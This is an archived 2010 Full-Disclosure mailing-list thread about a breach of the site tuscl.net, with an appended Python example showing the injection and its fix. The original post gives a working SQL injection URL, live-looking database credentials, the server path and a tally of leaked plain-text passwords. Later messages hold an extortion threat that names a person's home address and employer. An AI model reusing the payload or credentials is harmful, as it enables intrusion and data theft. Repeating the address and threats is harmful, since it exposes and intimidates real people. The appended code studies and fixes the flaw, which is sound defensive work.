Date: Wed, 8 Sep 2010 23:46:00 +0100
From: Benji <me@...ji.com>
To: Ben <iluv2cane@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, auto595158@...hmail.com,
	tuscl.founder@...il.com
Subject: Re: Tuscl.net SQL injection with 30k Plain Text
 Passwords & 80k Email list

This is gay.

On Wed, Sep 8, 2010 at 11:10 PM, Ben <iluv2cane@...il.com> wrote:
> From:  "www.tuscl.net" <tuscl.founder@...il.com>
> To:  auto595158@...hmail.com, iluv2cane@...il.com, benhuoh@...il.com,
> benhu@...sics.uakron.edu
> Date:  Wed, 08 Sep 2010 19:01:24 +0000
>
> Just received this email from the owner of the site:
>
> Ben
>
> How 'bout I send a couple of strippers over to your condo there in Akron so
> you can cane them.  You're still at 1381 Waters Edge, right?
>
>
> Then maybe I will blast out an email to all your colleagues there at the
> physics department of  the University of Akron with this little jewel...
>
> I have a suggestion for a Mood Pictures movie which would be called something
> like "Crime Deterrent Video for Girls." ...
>
> Ah, hell, Ben, you know the plot... but what I really like is the last line
> of the email:
>
> "I think it is a nice psychological touch to imagine a class of 14 or 15
> year-old girls being made to see the canings shown in this video.  "
>
> I'm sure the FBI will be all over that.
>
>
> Tell you what Mr. Ben Yu-Kuang Hu, let's make a deal.  You clean up the mess
> you made, stay the hell off my site, and I will forget this little escapade
> ever happened.
>
> Deal?
>
> -----------------------------------------------
> So first off, I should report your ass to the FBI for prostitution.
>
> Second, this email account I signed up with, happened to contain the same
> password for your site as it did its email.
> So to hide myself further and cause you to run around chasing my proxies and
> pin the blame on some retard who is obsessed over BDSM.
>
> Third, I'll fix your website, give me the root password :D
>
> On Fri, Sep 3, 2010 at 8:37 PM, Ben <iluv2cane@...il.com> wrote:
>>
>> worked in firefox....
>> if you see the title bar stating 3,8
>> that's the union select ;)
>> also per this page: http://www.tuscl.net/contact-login.php
>>
>> Recently we lost a week's worth of user data. We believe it was the work
>> of hackers, and have tightened our security measures.
>>
>> On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000@...oo.com> wrote:
>>>
>>> Well, one thing I will point out is that the link you submitted for the
>>> actual SQL injection doesn't seem to work. Either they fixed it or you messed
>>> up the link.
>>> ________________________________
>>> From: Ben <iluv2cane@...il.com>
>>> To: full-disclosure@...ts.grok.org.uk
>>> Sent: Fri, September 3, 2010 11:09:04 AM
>>> Subject: [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text
>>> Passwords & 80k Email list
>>>
>>> I found many sql injections on Tuscl.net (The ultimate strip club list)
>>>
>>> I tried notifying the site, no response. The server is run on a vmware.
>>> So anything that is done to it is restored, upon reboot.
>>>
>>> This is a dump of usernames passwords and emails for the site. They are
>>> in plain text. I have removed records that had the system generated password
>>> that the user never changed.
>>>
>>> http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
>>>
>>> Common Passwords and the number of accounts that shared them
>>>
>>> password - 269
>>> 123456 - 173
>>> tuscl - 84
>>> stripper - 67
>>> qwerty - 62
>>> 12345 - 49
>>> 12345678 - 47
>>> 1234 - 42
>>> baseball - 36
>>> monkey - 36
>>> princess - 34
>>> stripclub - 33
>>> strip - 32
>>> jennifer - 32
>>> abc123 - 32
>>> mustang - 31
>>> pussy - 29
>>> lapdance - 27
>>> andrew - 27
>>> jmh1978 - 27
>>> letmein - 27
>>> fuckyou - 27
>>> 696969 - 27
>>> michelle - 26
>>> harley - 25
>>> dallas - 25
>>> 111111 - 25
>>> shadow - 24
>>> corvette - 24
>>> trustno1 - 24
>>> sunshine - 22
>>> dragon - 21
>>> jordan - 21
>>> love - 21
>>> butthead - 20
>>> batman - 20
>>> danielle - 20
>>> buster - 20
>>> password1 - 20
>>> hello - 20
>>> biteme - 20
>>> gaydar - 20
>>> Michael - 19
>>> george - 19
>>> hockey - 19
>>> ginger - 19
>>> 6969 - 19
>>> Bandit - 19
>>> lasvegas - 18
>>> taylor - 18
>>> tigger - 18
>>> yankees - 18
>>> chicago - 18
>>> fucker - 18
>>> blahblah - 17
>>> football - 17
>>> 1escobar2 - 17
>>> 1111 - 17
>>> Jessica - 17
>>> 123456789 - 16
>>> testing - 16
>>> phoenix - 16
>>> badboy - 16
>>> gemini - 16
>>> ranger - 16
>>> heather - 15
>>> gateway - 15
>>> secret - 15
>>> welcome - 15
>>> 654321 - 15
>>> aaaaaa - 15
>>> tennis - 15
>>> asshole - 15
>>> maggie - 14
>>> pepper - 14
>>> charlie - 14
>>> golfer - 14
>>> strippers - 14
>>> redskins - 14
>>> summer - 14
>>> peanut - 14
>>> chicken - 13
>>> jeremy - 13
>>> hunter - 13
>>> m0ntlure - 13
>>> fuckoff - 13
>>> dancer - 13
>>> bitch - 13
>>> lucky - 13
>>> whatever - 13
>>> killer - 13
>>> prince - 13
>>> robert - 13
>>> orange - 13
>>> thomas - 13
>>> hawaii - 12
>>> redsox - 12
>>> tiger - 12
>>> titties - 12
>>> gators - 12
>>> florida - 12
>>> kitten - 12
>>> austin - 12
>>> merlin - 12
>>> canada - 12
>>> diamond - 12
>>> boston - 12
>>> master - 12
>>> yellow - 12
>>> falcon - 12
>>> jasmine - 12
>>> 1234567 - 12
>>> cookie - 12
>>> superman - 12
>>> midnight - 12
>>> blowme - 12
>>> jackass - 12
>>> sparky - 12
>>> peekaboo - 11
>>> doctor - 11
>>> brandy - 11
>>> 8675309 - 11
>>> madison - 11
>>> braves - 11
>>> brooklyn - 11
>>> money - 11
>>> anthony - 11
>>> samantha - 11
>>> ashley - 11
>>> lucky1 - 11
>>> amanda - 11
>>> booboo - 11
>>> SOCCER - 11
>>> tarheels - 11
>>> bigdog - 11
>>> pookie - 11
>>> private - 11
>>> tiffany - 11
>>> martin - 11
>>> silver - 11
>>> lakers - 10
>>> eatme - 10
>>> junior - 10
>>> platinum - 10
>>> sex - 10
>>> iloveyou - 10
>>> nicole - 10
>>> vegas - 10
>>> wolfpack - 10
>>> 55555555 - 10
>>> barney - 10
>>> melissa - 10
>>> molly - 10
>>> passw0rd - 10
>>> sexy - 10
>>> nascar - 10
>>> dietcoke - 10
>>> chris - 10
>>> boomer - 10
>>> test123 - 10
>>> johnny - 10
>>> red123 - 10
>>> asdfgh - 10
>>> ncc1701 - 10
>>> 314159 - 10
>>> internet - 10
>>> jackson - 10
>>> computer - 10
>>> peaches - 10
>>> horny - 10
>>> sierra - 10
>>> rush2112 - 10
>>>
>>> Here is the complete list of email addresses registered. The site had no
>>> validation so, I am sure, some are fake.
>>>
>>> The path to the working directory is:
>>> /home/httpd/vhosts/tuscl.net/httpdocs/
>>>
>>> The SQL information is
>>> "localhost" - "tuscl" - "szg4wpl9"
>>>
>>> Also if you want to look at all the nudey photos uploaded here is where
>>> they are
>>> http://www.tuscl.net/pictures/
>>>
>>> There are other sites that could have been compromised as well:
>>> vanjonesthinksimanasshole.com
>>> tuscl.com
>>> onerun.com
>>> ecampguide.com (contains another 1200 plain text passwords)
>>> troopedge.com
>>>
>>> Well have fun!
>>> Owner or media if you want to get ahold of me:
>>> auto595158@...hmail.com
>>>
>>
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
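
Added example, not part of the thread or the site's code: the two defects the original post reports (a numeric `CID` parameter concatenated into SQL, and passwords stored in plain text), each shown beside its fix. The table, column and function names are assumptions, the data is constructed, and the payload is the post's `union select` cut down to three columns.

```python
import hashlib
import hmac
import os
import sqlite3

# The CID value from the post, cut down to this table's three columns.
PAYLOAD = "-1 union select 1,2,3"

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE clubs (id INTEGER PRIMARY KEY, name TEXT, city TEXT);
        INSERT INTO clubs VALUES (1, 'Example Club', 'Springfield');
    """)
    return db

def lookup_concat(db, cid):
    # BEFORE: the request parameter is pasted into the SQL text, so
    # everything after the number is parsed as part of the statement.
    sql = "SELECT id, name, city FROM clubs WHERE id = " + cid
    return db.execute(sql).fetchall()

def lookup_bound(db, cid):
    # AFTER: accept only a positive integer, then bind it as a parameter
    # so the value can never change the shape of the statement.
    try:
        cid_int = int(cid)
    except ValueError:
        return []
    if cid_int < 1:
        return []
    sql = "SELECT id, name, city FROM clubs WHERE id = ?"
    return db.execute(sql, (cid_int,)).fetchall()

def hash_password(password, salt=None):
    # Store a salted, slow hash instead of the plain-text password.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password, salt, digest):
    # Recompute with the stored salt and compare in constant time.
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, PAYLOAD))  # injected row comes back
    print(lookup_bound(db, PAYLOAD))   # rejected before reaching SQL
```

The row returned by the concatenated query is made entirely of the injected numbers, which is what the "title bar stating 3,8" remark in the thread refers to: positions 3 and 8 of the injected select were the ones the page echoed.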
